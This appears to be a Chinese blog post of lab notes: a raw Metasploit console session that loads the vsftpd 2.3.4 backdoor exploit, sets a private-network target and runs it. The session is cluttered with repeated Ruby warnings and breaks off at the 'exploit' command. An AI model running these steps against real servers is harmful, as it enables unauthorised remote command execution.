美文网首页
1-Metasploit

1-Metasploit

作者: Tess鱼丸 | 来源:发表于2022-12-18 00:33 被阅读0次

    metasploit

    ┌──(root㉿kali)-[~]
    └─# msfconsole 
    HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
                                                      
                                       ___          ____
                                   ,-""   `.      < HONK >
                                 ,'  _   e )`-._ /  ----                         
                                /  ,' `-._<.===-'                                
                               /  /                                              
                              /  ;                                               
                  _          /   ;                                               
     (`._    _.-"" ""--..__,'    |                                               
     <_  `-""                     \                                              
      <`-                          :                                             
       (__   <__.                  ;                                             
         `-.   '-.__.      _.'    /                                              
            \      `-.__,-'    _,'                                               
             `._    ,    /__,-'                                                  
                ""._\__,'< <____                                                 
                     | |  `----.`.                                               
                     | |        \ `.                                             
                     ; |___      \-``                                            
                     \   --<                                                     
                      `.`.<                                                      
                        `-'                                                      
                                                                                 
                                                                                 
    
           =[ metasploit v6.2.9-dev                           ]
    + -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
    + -- --=[ 867 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]
    
    Metasploit tip: After running db_nmap, be sure to 
    check out the result of hosts and services
    
    msf6 > 
    msf6 > search vsftp
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor                                            
    
    msf6 > 
    msf6 > 
    msf6 > 
    msf6 > 
    msf6 > vsftpd_234_backdoor
    [-] Unknown command: vsftpd_234_backdoor
    msf6 > 
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
    [*] No payload configured, defaulting to cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cm/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
    d/unix/interact 
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), see https://githu
                                          b.com/rapid7/metasploit-framework/wik
                                          i/Using-Metasploit
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 
    rhosts => 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.102
    rhosts => 192.168.1.102
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS  192.168.1.102    yes       The target host(s), see https://githu
                                          b.com/rapid7/metasploit-framework/wik
                                          i/Using-Metasploit
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 
    

    相关文章

      网友评论

          本文标题:1-Metasploit

          本文链接:https://www.haomeiwen.com/subject/ofrdqdtx.html